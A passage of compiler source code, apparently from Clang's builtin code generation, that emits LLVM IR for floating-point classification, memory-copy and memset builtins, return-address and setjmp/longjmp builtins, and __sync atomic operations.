if (Value *Result = getTargetHooks().testFPKind(V, BuiltinID, Builder, CGM))
return RValue::get(Result);
// Inf values have all exp bits set and a zero significand. Therefore:
// isinf(V) == ((V << 1) == ((exp mask) << 1))
// isfinite(V) == ((V << 1) < ((exp mask) << 1)) using unsigned comparison
unsigned bitsize = Ty->getScalarSizeInBits();
llvm::IntegerType *IntTy = Builder.getIntNTy(bitsize);
Value *IntV = Builder.CreateBitCast(V, IntTy);
Value *Shl1 = Builder.CreateShl(IntV, 1);
const llvm::fltSemantics &Semantics = Ty->getFltSemantics();
APInt ExpMask = APFloat::getInf(Semantics).bitcastToAPInt();
Value *ExpMaskShl1 = llvm::ConstantInt::get(IntTy, ExpMask.shl(1));
if (BuiltinID == Builtin::BI__builtin_isinf)
V = Builder.CreateICmpEQ(Shl1, ExpMaskShl1);
else
V = Builder.CreateICmpULT(Shl1, ExpMaskShl1);
return RValue::get(Builder.CreateZExt(V, ConvertType(E->getType())));
}
case Builtin::BI__builtin_isinf_sign: {
// isinf_sign(x) -> fabs(x) == infinity ? (signbit(x) ? -1 : 1) : 0
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *Arg = EmitScalarExpr(E->getArg(0));
Value *AbsArg = EmitFAbs(*this, Arg);
Value *IsInf = Builder.CreateFCmpOEQ(
AbsArg, ConstantFP::getInfinity(Arg->getType()), "isinf");
Value *IsNeg = EmitSignBit(*this, Arg);
llvm::Type *IntTy = ConvertType(E->getType());
Value *Zero = Constant::getNullValue(IntTy);
Value *One = ConstantInt::get(IntTy, 1);
Value *NegativeOne = ConstantInt::get(IntTy, -1);
Value *SignResult = Builder.CreateSelect(IsNeg, NegativeOne, One);
Value *Result = Builder.CreateSelect(IsInf, SignResult, Zero);
return RValue::get(Result);
}
case Builtin::BI__builtin_isnormal: {
// isnormal(x) --> x == x && fabsf(x) < infinity && fabsf(x) >= float_min
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *V = EmitScalarExpr(E->getArg(0));
Value *Eq = Builder.CreateFCmpOEQ(V, V, "iseq");
Value *Abs = EmitFAbs(*this, V);
Value *IsLessThanInf =
Builder.CreateFCmpULT(Abs, ConstantFP::getInfinity(V->getType()),"isinf");
APFloat Smallest = APFloat::getSmallestNormalized(
getContext().getFloatTypeSemantics(E->getArg(0)->getType()));
Value *IsNormal =
Builder.CreateFCmpUGE(Abs, ConstantFP::get(V->getContext(), Smallest),
"isnormal");
V = Builder.CreateAnd(Eq, IsLessThanInf, "and");
V = Builder.CreateAnd(V, IsNormal, "and");
return RValue::get(Builder.CreateZExt(V, ConvertType(E->getType())));
}
case Builtin::BI__builtin_flt_rounds: {
Function *F = CGM.getIntrinsic(Intrinsic::flt_rounds);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateCall(F);
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_fpclassify: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *V = EmitScalarExpr(E->getArg(5));
llvm::Type *Ty = ConvertType(E->getArg(5)->getType());
// Create Result
BasicBlock *Begin = Builder.GetInsertBlock();
BasicBlock *End = createBasicBlock("fpclassify_end", this->CurFn);
Builder.SetInsertPoint(End);
PHINode *Result =
Builder.CreatePHI(ConvertType(E->getArg(0)->getType()), 4,
"fpclassify_result");
// if (V == 0) return FP_ZERO
Builder.SetInsertPoint(Begin);
Value *IsZero = Builder.CreateFCmpOEQ(V, Constant::getNullValue(Ty),
"iszero");
Value *ZeroLiteral = EmitScalarExpr(E->getArg(4));
BasicBlock *NotZero = createBasicBlock("fpclassify_not_zero", this->CurFn);
Builder.CreateCondBr(IsZero, End, NotZero);
Result->addIncoming(ZeroLiteral, Begin);
// if (V != V) return FP_NAN
Builder.SetInsertPoint(NotZero);
Value *IsNan = Builder.CreateFCmpUNO(V, V, "cmp");
Value *NanLiteral = EmitScalarExpr(E->getArg(0));
BasicBlock *NotNan = createBasicBlock("fpclassify_not_nan", this->CurFn);
Builder.CreateCondBr(IsNan, End, NotNan);
Result->addIncoming(NanLiteral, NotZero);
// if (fabs(V) == infinity) return FP_INFINITY
Builder.SetInsertPoint(NotNan);
Value *VAbs = EmitFAbs(*this, V);
Value *IsInf =
Builder.CreateFCmpOEQ(VAbs, ConstantFP::getInfinity(V->getType()),
"isinf");
Value *InfLiteral = EmitScalarExpr(E->getArg(1));
BasicBlock *NotInf = createBasicBlock("fpclassify_not_inf", this->CurFn);
Builder.CreateCondBr(IsInf, End, NotInf);
Result->addIncoming(InfLiteral, NotNan);
// if (fabs(V) >= MIN_NORMAL) return FP_NORMAL else FP_SUBNORMAL
Builder.SetInsertPoint(NotInf);
APFloat Smallest = APFloat::getSmallestNormalized(
getContext().getFloatTypeSemantics(E->getArg(5)->getType()));
Value *IsNormal =
Builder.CreateFCmpUGE(VAbs, ConstantFP::get(V->getContext(), Smallest),
"isnormal");
Value *NormalResult =
Builder.CreateSelect(IsNormal, EmitScalarExpr(E->getArg(2)),
EmitScalarExpr(E->getArg(3)));
Builder.CreateBr(End);
Result->addIncoming(NormalResult, NotInf);
// return Result
Builder.SetInsertPoint(End);
return RValue::get(Result);
}
case Builtin::BIalloca:
case Builtin::BI_alloca:
case Builtin::BI__builtin_alloca: {
Value *Size = EmitScalarExpr(E->getArg(0));
const TargetInfo &TI = getContext().getTargetInfo();
// The alignment of the alloca should correspond to __BIGGEST_ALIGNMENT__.
const Align SuitableAlignmentInBytes =
CGM.getContext()
.toCharUnitsFromBits(TI.getSuitableAlign())
.getAsAlign();
AllocaInst *AI = Builder.CreateAlloca(Builder.getInt8Ty(), Size);
AI->setAlignment(SuitableAlignmentInBytes);
initializeAlloca(*this, AI, Size, SuitableAlignmentInBytes);
return RValue::get(AI);
}
case Builtin::BI__builtin_alloca_with_align: {
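// Like __builtin_alloca, but the second argument supplies the alignment
// in bits rather than using __BIGGEST_ALIGNMENT__.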
Value *Size = EmitScalarExpr(E->getArg(0));
Value *AlignmentInBitsValue = EmitScalarExpr(E->getArg(1));
auto *AlignmentInBitsCI = cast<ConstantInt>(AlignmentInBitsValue);
unsigned AlignmentInBits = AlignmentInBitsCI->getZExtValue();
const Align AlignmentInBytes =
CGM.getContext().toCharUnitsFromBits(AlignmentInBits).getAsAlign();
AllocaInst *AI = Builder.CreateAlloca(Builder.getInt8Ty(), Size);
AI->setAlignment(AlignmentInBytes);
initializeAlloca(*this, AI, Size, AlignmentInBytes);
return RValue::get(AI);
}
case Builtin::BIbzero:
case Builtin::BI__builtin_bzero: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Value *SizeVal = EmitScalarExpr(E->getArg(1));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
Builder.CreateMemSet(Dest, Builder.getInt8(0), SizeVal, false);
return RValue::get(nullptr);
}
case Builtin::BImemcpy:
case Builtin::BI__builtin_memcpy:
case Builtin::BImempcpy:
case Builtin::BI__builtin_mempcpy: {
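// memcpy returns the destination pointer; mempcpy returns a pointer one
// past the last byte written (dest + size).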
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = EmitScalarExpr(E->getArg(2));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 1);
Builder.CreateMemCpy(Dest, Src, SizeVal, false);
if (BuiltinID == Builtin::BImempcpy ||
BuiltinID == Builtin::BI__builtin_mempcpy)
return RValue::get(Builder.CreateInBoundsGEP(Dest.getElementType(),
Dest.getPointer(), SizeVal));
else
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin_memcpy_inline: {
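// The size operand must be a constant; llvm.memcpy.inline guarantees
// expansion without a library call.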
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
uint64_t Size =
E->getArg(2)->EvaluateKnownConstInt(getContext()).getZExtValue();
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 1);
Builder.CreateMemCpyInline(Dest, Src, Size);
return RValue::get(nullptr);
}
case Builtin::BI__builtin_char_memchr:
BuiltinID = Builtin::BI__builtin_memchr;
break;
case Builtin::BI__builtin___memcpy_chk: {
// fold __builtin_memcpy_chk(x, y, cst1, cst2) to memcpy iff cst1<=cst2.
Expr::EvalResult SizeResult, DstSizeResult;
if (!E->getArg(2)->EvaluateAsInt(SizeResult, CGM.getContext()) ||
!E->getArg(3)->EvaluateAsInt(DstSizeResult, CGM.getContext()))
break;
llvm::APSInt Size = SizeResult.Val.getInt();
llvm::APSInt DstSize = DstSizeResult.Val.getInt();
if (Size.ugt(DstSize))
break;
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = llvm::ConstantInt::get(Builder.getContext(), Size);
Builder.CreateMemCpy(Dest, Src, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin_objc_memmove_collectable: {
Address DestAddr = EmitPointerWithAlignment(E->getArg(0));
Address SrcAddr = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = EmitScalarExpr(E->getArg(2));
CGM.getObjCRuntime().EmitGCMemmoveCollectable(*this,
DestAddr, SrcAddr, SizeVal);
return RValue::get(DestAddr.getPointer());
}
case Builtin::BI__builtin___memmove_chk: {
// fold __builtin_memmove_chk(x, y, cst1, cst2) to memmove iff cst1<=cst2.
Expr::EvalResult SizeResult, DstSizeResult;
if (!E->getArg(2)->EvaluateAsInt(SizeResult, CGM.getContext()) ||
!E->getArg(3)->EvaluateAsInt(DstSizeResult, CGM.getContext()))
break;
llvm::APSInt Size = SizeResult.Val.getInt();
llvm::APSInt DstSize = DstSizeResult.Val.getInt();
if (Size.ugt(DstSize))
break;
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = llvm::ConstantInt::get(Builder.getContext(), Size);
Builder.CreateMemMove(Dest, Src, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BImemmove:
case Builtin::BI__builtin_memmove: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = EmitScalarExpr(E->getArg(2));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 1);
Builder.CreateMemMove(Dest, Src, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BImemset:
case Builtin::BI__builtin_memset: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Value *ByteVal = Builder.CreateTrunc(EmitScalarExpr(E->getArg(1)),
Builder.getInt8Ty());
Value *SizeVal = EmitScalarExpr(E->getArg(2));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
Builder.CreateMemSet(Dest, ByteVal, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin___memset_chk: {
// fold __builtin_memset_chk(x, y, cst1, cst2) to memset iff cst1<=cst2.
Expr::EvalResult SizeResult, DstSizeResult;
if (!E->getArg(2)->EvaluateAsInt(SizeResult, CGM.getContext()) ||
!E->getArg(3)->EvaluateAsInt(DstSizeResult, CGM.getContext()))
break;
llvm::APSInt Size = SizeResult.Val.getInt();
llvm::APSInt DstSize = DstSizeResult.Val.getInt();
if (Size.ugt(DstSize))
break;
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Value *ByteVal = Builder.CreateTrunc(EmitScalarExpr(E->getArg(1)),
Builder.getInt8Ty());
Value *SizeVal = llvm::ConstantInt::get(Builder.getContext(), Size);
Builder.CreateMemSet(Dest, ByteVal, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin_wmemchr: {
// The MSVC runtime library does not provide a definition of wmemchr, so we
// need an inline implementation.
if (!getTarget().getTriple().isOSMSVCRT())
break;
llvm::Type *WCharTy = ConvertType(getContext().WCharTy);
Value *Str = EmitScalarExpr(E->getArg(0));
Value *Chr = EmitScalarExpr(E->getArg(1));
Value *Size = EmitScalarExpr(E->getArg(2));
BasicBlock *Entry = Builder.GetInsertBlock();
BasicBlock *CmpEq = createBasicBlock("wmemchr.eq");
BasicBlock *Next = createBasicBlock("wmemchr.next");
BasicBlock *Exit = createBasicBlock("wmemchr.exit");
Value *SizeEq0 = Builder.CreateICmpEQ(Size, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(SizeEq0, Exit, CmpEq);
EmitBlock(CmpEq);
PHINode *StrPhi = Builder.CreatePHI(Str->getType(), 2);
StrPhi->addIncoming(Str, Entry);
PHINode *SizePhi = Builder.CreatePHI(SizeTy, 2);
SizePhi->addIncoming(Size, Entry);
CharUnits WCharAlign =
getContext().getTypeAlignInChars(getContext().WCharTy);
Value *StrCh = Builder.CreateAlignedLoad(WCharTy, StrPhi, WCharAlign);
Value *FoundChr = Builder.CreateConstInBoundsGEP1_32(WCharTy, StrPhi, 0);
Value *StrEqChr = Builder.CreateICmpEQ(StrCh, Chr);
Builder.CreateCondBr(StrEqChr, Exit, Next);
EmitBlock(Next);
Value *NextStr = Builder.CreateConstInBoundsGEP1_32(WCharTy, StrPhi, 1);
Value *NextSize = Builder.CreateSub(SizePhi, ConstantInt::get(SizeTy, 1));
Value *NextSizeEq0 =
Builder.CreateICmpEQ(NextSize, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(NextSizeEq0, Exit, CmpEq);
StrPhi->addIncoming(NextStr, Next);
SizePhi->addIncoming(NextSize, Next);
EmitBlock(Exit);
PHINode *Ret = Builder.CreatePHI(Str->getType(), 3);
Ret->addIncoming(llvm::Constant::getNullValue(Str->getType()), Entry);
Ret->addIncoming(llvm::Constant::getNullValue(Str->getType()), Next);
Ret->addIncoming(FoundChr, CmpEq);
return RValue::get(Ret);
}
case Builtin::BI__builtin_wmemcmp: {
// The MSVC runtime library does not provide a definition of wmemcmp, so we
// need an inline implementation.
if (!getTarget().getTriple().isOSMSVCRT())
break;
llvm::Type *WCharTy = ConvertType(getContext().WCharTy);
Value *Dst = EmitScalarExpr(E->getArg(0));
Value *Src = EmitScalarExpr(E->getArg(1));
Value *Size = EmitScalarExpr(E->getArg(2));
BasicBlock *Entry = Builder.GetInsertBlock();
BasicBlock *CmpGT = createBasicBlock("wmemcmp.gt");
BasicBlock *CmpLT = createBasicBlock("wmemcmp.lt");
BasicBlock *Next = createBasicBlock("wmemcmp.next");
BasicBlock *Exit = createBasicBlock("wmemcmp.exit");
Value *SizeEq0 = Builder.CreateICmpEQ(Size, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(SizeEq0, Exit, CmpGT);
EmitBlock(CmpGT);
PHINode *DstPhi = Builder.CreatePHI(Dst->getType(), 2);
DstPhi->addIncoming(Dst, Entry);
PHINode *SrcPhi = Builder.CreatePHI(Src->getType(), 2);
SrcPhi->addIncoming(Src, Entry);
PHINode *SizePhi = Builder.CreatePHI(SizeTy, 2);
SizePhi->addIncoming(Size, Entry);
CharUnits WCharAlign =
getContext().getTypeAlignInChars(getContext().WCharTy);
Value *DstCh = Builder.CreateAlignedLoad(WCharTy, DstPhi, WCharAlign);
Value *SrcCh = Builder.CreateAlignedLoad(WCharTy, SrcPhi, WCharAlign);
Value *DstGtSrc = Builder.CreateICmpUGT(DstCh, SrcCh);
Builder.CreateCondBr(DstGtSrc, Exit, CmpLT);
EmitBlock(CmpLT);
Value *DstLtSrc = Builder.CreateICmpULT(DstCh, SrcCh);
Builder.CreateCondBr(DstLtSrc, Exit, Next);
EmitBlock(Next);
Value *NextDst = Builder.CreateConstInBoundsGEP1_32(WCharTy, DstPhi, 1);
Value *NextSrc = Builder.CreateConstInBoundsGEP1_32(WCharTy, SrcPhi, 1);
Value *NextSize = Builder.CreateSub(SizePhi, ConstantInt::get(SizeTy, 1));
Value *NextSizeEq0 =
Builder.CreateICmpEQ(NextSize, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(NextSizeEq0, Exit, CmpGT);
DstPhi->addIncoming(NextDst, Next);
SrcPhi->addIncoming(NextSrc, Next);
SizePhi->addIncoming(NextSize, Next);
EmitBlock(Exit);
PHINode *Ret = Builder.CreatePHI(IntTy, 4);
Ret->addIncoming(ConstantInt::get(IntTy, 0), Entry);
Ret->addIncoming(ConstantInt::get(IntTy, 1), CmpGT);
Ret->addIncoming(ConstantInt::get(IntTy, -1), CmpLT);
Ret->addIncoming(ConstantInt::get(IntTy, 0), Next);
return RValue::get(Ret);
}
case Builtin::BI__builtin_dwarf_cfa: {
// The offset in bytes from the first argument to the CFA.
//
// Why on earth is this in the frontend? Is there any reason at
// all that the backend can't reasonably determine this while
// lowering llvm.eh.dwarf.cfa()?
//
// TODO: If there's a satisfactory reason, add a target hook for
// this instead of hard-coding 0, which is correct for most targets.
int32_t Offset = 0;
Function *F = CGM.getIntrinsic(Intrinsic::eh_dwarf_cfa);
return RValue::get(Builder.CreateCall(F,
llvm::ConstantInt::get(Int32Ty, Offset)));
}
case Builtin::BI__builtin_return_address: {
Value *Depth = ConstantEmitter(*this).emitAbstract(E->getArg(0),
getContext().UnsignedIntTy);
Function *F = CGM.getIntrinsic(Intrinsic::returnaddress);
return RValue::get(Builder.CreateCall(F, Depth));
}
case Builtin::BI_ReturnAddress: {
Function *F = CGM.getIntrinsic(Intrinsic::returnaddress);
return RValue::get(Builder.CreateCall(F, Builder.getInt32(0)));
}
case Builtin::BI__builtin_frame_address: {
Value *Depth = ConstantEmitter(*this).emitAbstract(E->getArg(0),
getContext().UnsignedIntTy);
Function *F = CGM.getIntrinsic(Intrinsic::frameaddress, AllocaInt8PtrTy);
return RValue::get(Builder.CreateCall(F, Depth));
}
case Builtin::BI__builtin_extract_return_addr: {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *Result = getTargetHooks().decodeReturnAddress(*this, Address);
return RValue::get(Result);
}
case Builtin::BI__builtin_frob_return_addr: {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *Result = getTargetHooks().encodeReturnAddress(*this, Address);
return RValue::get(Result);
}
case Builtin::BI__builtin_dwarf_sp_column: {
llvm::IntegerType *Ty
= cast<llvm::IntegerType>(ConvertType(E->getType()));
int Column = getTargetHooks().getDwarfEHStackPointer(CGM);
if (Column == -1) {
CGM.ErrorUnsupported(E, "__builtin_dwarf_sp_column");
return RValue::get(llvm::UndefValue::get(Ty));
}
return RValue::get(llvm::ConstantInt::get(Ty, Column, true));
}
case Builtin::BI__builtin_init_dwarf_reg_size_table: {
Value *Address = EmitScalarExpr(E->getArg(0));
if (getTargetHooks().initDwarfEHRegSizeTable(*this, Address))
CGM.ErrorUnsupported(E, "__builtin_init_dwarf_reg_size_table");
return RValue::get(llvm::UndefValue::get(ConvertType(E->getType())));
}
case Builtin::BI__builtin_eh_return: {
Value *Int = EmitScalarExpr(E->getArg(0));
Value *Ptr = EmitScalarExpr(E->getArg(1));
llvm::IntegerType *IntTy = cast<llvm::IntegerType>(Int->getType());
assert((IntTy->getBitWidth() == 32 || IntTy->getBitWidth() == 64) &&
"LLVM's __builtin_eh_return only supports 32- and 64-bit variants");
Function *F =
CGM.getIntrinsic(IntTy->getBitWidth() == 32 ? Intrinsic::eh_return_i32
: Intrinsic::eh_return_i64);
Builder.CreateCall(F, {Int, Ptr});
Builder.CreateUnreachable();
// We do need to preserve an insertion point.
EmitBlock(createBasicBlock("builtin_eh_return.cont"));
return RValue::get(nullptr);
}
case Builtin::BI__builtin_unwind_init: {
Function *F = CGM.getIntrinsic(Intrinsic::eh_unwind_init);
return RValue::get(Builder.CreateCall(F));
}
case Builtin::BI__builtin_extend_pointer: {
// Extends a pointer to the size of an _Unwind_Word, which is
// uint64_t on all platforms. Generally this gets poked into a
// register and eventually used as an address, so if the
// addressing registers are wider than pointers and the platform
// doesn't implicitly ignore high-order bits when doing
// addressing, we need to make sure we zext / sext based on
// the platform's expectations.
//
// See: http://gcc.gnu.org/ml/gcc-bugs/2002-02/msg00237.html
// Cast the pointer to intptr_t.
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Result = Builder.CreatePtrToInt(Ptr, IntPtrTy, "extend.cast");
// If that's 64 bits, we're done.
if (IntPtrTy->getBitWidth() == 64)
return RValue::get(Result);
// Otherwise, ask the codegen data what to do.
if (getTargetHooks().extendPointerWithSExt())
return RValue::get(Builder.CreateSExt(Result, Int64Ty, "extend.sext"));
else
return RValue::get(Builder.CreateZExt(Result, Int64Ty, "extend.zext"));
}
case Builtin::BI__builtin_setjmp: {
// Buffer is a void**.
Address Buf = EmitPointerWithAlignment(E->getArg(0));
// Store the frame pointer to the setjmp buffer.
Value *FrameAddr = Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::frameaddress, AllocaInt8PtrTy),
ConstantInt::get(Int32Ty, 0));
Builder.CreateStore(FrameAddr, Buf);
// Store the stack pointer to the setjmp buffer.
Value *StackAddr =
Builder.CreateCall(CGM.getIntrinsic(Intrinsic::stacksave));
Address StackSaveSlot = Builder.CreateConstInBoundsGEP(Buf, 2);
Builder.CreateStore(StackAddr, StackSaveSlot);
// Call LLVM's EH setjmp, which is lightweight.
Function *F = CGM.getIntrinsic(Intrinsic::eh_sjlj_setjmp);
Buf = Builder.CreateBitCast(Buf, Int8PtrTy);
return RValue::get(Builder.CreateCall(F, Buf.getPointer()));
}
case Builtin::BI__builtin_longjmp: {
Value *Buf = EmitScalarExpr(E->getArg(0));
Buf = Builder.CreateBitCast(Buf, Int8PtrTy);
// Call LLVM's EH longjmp, which is lightweight.
Builder.CreateCall(CGM.getIntrinsic(Intrinsic::eh_sjlj_longjmp), Buf);
// longjmp doesn't return; mark this as unreachable.
Builder.CreateUnreachable();
// We do need to preserve an insertion point.
EmitBlock(createBasicBlock("longjmp.cont"));
return RValue::get(nullptr);
}
case Builtin::BI__builtin_launder: {
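// Only emit llvm.launder.invariant.group when the pointee type actually
// requires laundering; otherwise the pointer is returned unchanged.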
const Expr *Arg = E->getArg(0);
QualType ArgTy = Arg->getType()->getPointeeType();
Value *Ptr = EmitScalarExpr(Arg);
if (TypeRequiresBuiltinLaunder(CGM, ArgTy))
Ptr = Builder.CreateLaunderInvariantGroup(Ptr);
return RValue::get(Ptr);
}
case Builtin::BI__sync_fetch_and_add:
case Builtin::BI__sync_fetch_and_sub:
case Builtin::BI__sync_fetch_and_or:
case Builtin::BI__sync_fetch_and_and:
case Builtin::BI__sync_fetch_and_xor:
case Builtin::BI__sync_fetch_and_nand:
case Builtin::BI__sync_add_and_fetch:
case Builtin::BI__sync_sub_and_fetch:
case Builtin::BI__sync_and_and_fetch:
case Builtin::BI__sync_or_and_fetch:
case Builtin::BI__sync_xor_and_fetch:
case Builtin::BI__sync_nand_and_fetch:
case Builtin::BI__sync_val_compare_and_swap:
case Builtin::BI__sync_bool_compare_and_swap:
case Builtin::BI__sync_lock_test_and_set:
case Builtin::BI__sync_lock_release:
case Builtin::BI__sync_swap:
llvm_unreachable("Shouldn't make it through sema");
case Builtin::BI__sync_fetch_and_add_1:
case Builtin::BI__sync_fetch_and_add_2:
case Builtin::BI__sync_fetch_and_add_4:
case Builtin::BI__sync_fetch_and_add_8:
case Builtin::BI__sync_fetch_and_add_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Add, E);
case Builtin::BI__sync_fetch_and_sub_1:
case Builtin::BI__sync_fetch_and_sub_2:
case Builtin::BI__sync_fetch_and_sub_4:
case Builtin::BI__sync_fetch_and_sub_8:
case Builtin::BI__sync_fetch_and_sub_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Sub, E);
case Builtin::BI__sync_fetch_and_or_1:
case Builtin::BI__sync_fetch_and_or_2:
case Builtin::BI__sync_fetch_and_or_4:
case Builtin::BI__sync_fetch_and_or_8:
case Builtin::BI__sync_fetch_and_or_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Or, E);
case Builtin::BI__sync_fetch_and_and_1:
case Builtin::BI__sync_fetch_and_and_2:
case Builtin::BI__sync_fetch_and_and_4:
case Builtin::BI__sync_fetch_and_and_8:
case Builtin::BI__sync_fetch_and_and_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::And, E);
case Builtin::BI__sync_fetch_and_xor_1:
case Builtin::BI__sync_fetch_and_xor_2:
case Builtin::BI__sync_fetch_and_xor_4:
case Builtin::BI__sync_fetch_and_xor_8:
case Builtin::BI__sync_fetch_and_xor_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Xor, E);
case Builtin::BI__sync_fetch_and_nand_1:
case Builtin::BI__sync_fetch_and_nand_2:
case Builtin::BI__sync_fetch_and_nand_4:
case Builtin::BI__sync_fetch_and_nand_8:
case Builtin::BI__sync_fetch_and_nand_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Nand, E);
// Clang extensions: not overloaded yet.
case Builtin::BI__sync_fetch_and_min:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Min, E);
case Builtin::BI__sync_fetch_and_max:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Max, E);
case Builtin::BI__sync_fetch_and_umin:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::UMin, E);
case Builtin::BI__sync_fetch_and_umax:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::UMax, E);
case Builtin::BI__sync_add_and_fetch_1:
case Builtin::BI__sync_add_and_fetch_2:
case Builtin::BI__sync_add_and_fetch_4:
case Builtin::BI__sync_add_and_fetch_8:
case Builtin::BI__sync_add_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Add, E,
llvm::Instruction::Add);
case Builtin::BI__sync_sub_and_fetch_1:
case Builtin::BI__sync_sub_and_fetch_2:
case Builtin::BI__sync_sub_and_fetch_4:
case Builtin::BI__sync_sub_and_fetch_8:
case Builtin::BI__sync_sub_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Sub, E,
llvm::Instruction::Sub);
case Builtin::BI__sync_and_and_fetch_1:
case Builtin::BI__sync_and_and_fetch_2:
case Builtin::BI__sync_and_and_fetch_4:
case Builtin::BI__sync_and_and_fetch_8:
case Builtin::BI__sync_and_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::And, E,
llvm::Instruction::And);
case Builtin::BI__sync_or_and_fetch_1:
case Builtin::BI__sync_or_and_fetch_2:
case Builtin::BI__sync_or_and_fetch_4:
case Builtin::BI__sync_or_and_fetch_8:
case Builtin::BI__sync_or_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Or, E,
llvm::Instruction::Or);
case Builtin::BI__sync_xor_and_fetch_1:
case Builtin::BI__sync_xor_and_fetch_2:
case Builtin::BI__sync_xor_and_fetch_4:
case Builtin::BI__sync_xor_and_fetch_8:
case Builtin::BI__sync_xor_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Xor, E,
llvm::Instruction::Xor);
case Builtin::BI__sync_nand_and_fetch_1:
case Builtin::BI__sync_nand_and_fetch_2:
case Builtin::BI__sync_nand_and_fetch_4:
case Builtin::BI__sync_nand_and_fetch_8:
case Builtin::BI__sync_nand_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Nand, E,
llvm::Instruction::And, true);
case Builtin::BI__sync_val_compare_and_swap_1:
case Builtin::BI__sync_val_compare_and_swap_2:
case Builtin::BI__sync_val_compare_and_swap_4:
case Builtin::BI__sync_val_compare_and_swap_8:
case Builtin::BI__sync_val_compare_and_swap_16:
return RValue::get(MakeAtomicCmpXchgValue(*this, E, false));
case Builtin::BI__sync_bool_compare_and_swap_1:
case Builtin::BI__sync_bool_compare_and_swap_2:
case Builtin::BI__sync_bool_compare_and_swap_4:
case Builtin::BI__sync_bool_compare_and_swap_8:
case Builtin::BI__sync_bool_compare_and_swap_16:
return RValue::get(MakeAtomicCmpXchgValue(*this, E, true));
case Builtin::BI__sync_swap_1:
case Builtin::BI__sync_swap_2:
case Builtin::BI__sync_swap_4:
case Builtin::BI__sync_swap_8:
case Builtin::BI__sync_swap_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Xchg, E);
case Builtin::BI__sync_lock_test_and_set_1:
case Builtin::BI__sync_lock_test_and_set_2:
case Builtin::BI__sync_lock_test_and_set_4:
case Builtin::BI__sync_lock_test_and_set_8:
case Builtin::BI__sync_lock_test_and_set_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Xchg, E);
case Builtin::BI__sync_lock_release_1:
case Builtin::BI__sync_lock_release_2:
case Builtin::BI__sync_lock_release_4:
case Builtin::BI__sync_lock_release_8:
case Builtin::BI__sync_lock_release_16: {
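// __sync_lock_release is an atomic store of zero with release ordering,
// sized to the pointee type.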
